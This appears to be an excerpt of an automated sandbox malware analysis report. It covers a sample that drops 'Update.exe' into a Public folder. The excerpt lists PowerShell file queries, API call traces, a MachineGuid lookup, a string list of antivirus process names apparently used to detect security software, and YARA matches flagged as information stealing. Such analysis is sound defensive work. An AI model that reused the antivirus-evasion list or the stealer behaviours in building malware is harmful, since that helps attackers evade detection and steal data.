                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_03805D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_03805D22
                      Source: C:\Users\user\Desktop\Uulw5M1DfU.exeCode function: 0_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
                      Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Update.exeBinary or memory string: acs.exe
                      Source: Update.exeBinary or memory string: vsserv.exe
                      Source: Update.exeBinary or memory string: kxetray.exe
                      Source: Update.exeBinary or memory string: avcenter.exe
                      Source: Update.exeBinary or memory string: KSafeTray.exe
                      Source: Update.exeBinary or memory string: cfp.exe
                      Source: Update.exeBinary or memory string: avp.exe
                      Source: Update.exeBinary or memory string: 360Safe.exe
                      Source: Update.exeBinary or memory string: rtvscan.exe
                      Source: Update.exeBinary or memory string: 360tray.exe
                      Source: Update.exeBinary or memory string: ashDisp.exe
                      Source: Update.exeBinary or memory string: TMBMSRV.exe
                      Source: Update.exeBinary or memory string: 360Tray.exe
                      Source: Update.exeBinary or memory string: avgwdsvc.exe
                      Source: Update.exeBinary or memory string: AYAgent.aye
                      Source: Update.exeBinary or memory string: QUHLPSVC.EXE
                      Source: Update.exeBinary or memory string: RavMonD.exe
                      Source: Update.exeBinary or memory string: Mcshield.exe
                      Source: Update.exeBinary or memory string: K7TSecurity.exe

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.14.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.14.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.36705bf.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.37f0000.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.482260b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.92667b.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.37f0000.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.35b1053.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.36705bf.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.12.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.92667b.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1004.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.32e1004.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.Update.exe.35b1053.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.Update.exe.482260b.8.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000003.3003485617.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510627044.0000000003670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2842291150.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3490479814.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2679063829.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3003550749.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3334123549.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3490537983.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2556030347.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.3166004269.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2679005729.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3510572930.00000000035B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2841813776.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.2679005729.00000000047BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.3511507592.0000000004821000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
